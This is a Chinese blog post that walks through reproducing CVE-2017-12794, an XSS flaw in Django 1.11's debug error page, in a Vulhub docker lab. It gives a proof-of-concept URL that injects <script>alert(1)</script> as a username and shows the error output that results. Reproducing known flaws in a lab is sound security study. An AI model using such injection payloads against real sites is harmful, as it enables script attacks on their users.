【漏洞复现】Django_debug page_XSS漏洞(CVE-2017-12794)

过期的秋刀鱼-2023-11-05 14:46

感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规

文章目录

说明 内容
漏洞编号 CVE-2017-12794
漏洞名称 Django_debug page_XSS漏洞
漏洞评级
影响范围 1.11.5版本
漏洞描述
修复方案

1.1、漏洞描述

1.11.5版本,修复了500页面中存在的一个XSS漏洞

1.2、漏洞等级

1.3、影响版本

Django 1.11.5版本

1.4、漏洞复现

1、基础环境

Path:Vulhub/django/CVE-2017-12794

启动测试环境:

bash 复制代码 
sudo docker-compose up -d

访问http://your-ip:8000/即可看到

2、漏洞分析

vulhub

3、漏洞验证
复制代码 
http://192.168.8.8:8000/create_user/?username=%3Cscript%3Ealert(1)%3C/script%3E

用户已经被 创建

再次刷新页面触发XSS

抛出异常

python 复制代码 
duplicate key value violates unique constraint "xss_user_username_key"
DETAIL:  Key (username)=(<script>alert(1)</script>) already exists.
相关推荐
alvin_200514 分钟前
python之OpenGL应用(二)Hello Triangle
python·opengl
铁蛋AI编程实战23 分钟前
通义千问 3.5 Turbo GGUF 量化版本地部署教程:4G 显存即可运行,数据永不泄露
java·人工智能·python
jiang_changsheng35 分钟前
RTX 2080 Ti魔改22GB显卡的最优解ComfyUI教程
python·comfyui
0思必得01 小时前
[Web自动化] Selenium处理滚动条
前端·爬虫·python·selenium·自动化
沈浩(种子思维作者)1 小时前
系统要活起来就必须开放包容去中心化
人工智能·python·flask·量子计算
2301_790300962 小时前
Python数据库操作:SQLAlchemy ORM指南
jvm·数据库·python
意疏2 小时前
程序员兼职如何选择靠谱的软件外包平台 与 我的避坑经验
django
m0_736919102 小时前
用Pandas处理时间序列数据(Time Series)
jvm·数据库·python
getapi2 小时前
实时音视频传输与屏幕共享(投屏)
python
java干货2 小时前
为什么 “File 10“ 排在 “File 2“ 前面?解决文件名排序的终极算法:自然排序
开发语言·python·算法
热门推荐
01GitHub 镜像站点02Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services03Linux下V2Ray安装配置指南04使用 1panel面板 部署 php网站05OpenClaw Chrome扩展使用教程 - 浏览器中继控制06Vue-skills的中文文档07UV安装并设置国内源08让 Trae IDE 智能体 “读懂”文档 Excel+PDF+DOCX :mcp-documents-reader 工具使用指南09Claude Code Skills 实用使用手册10openclaw配置教程(linux+局域网ollama)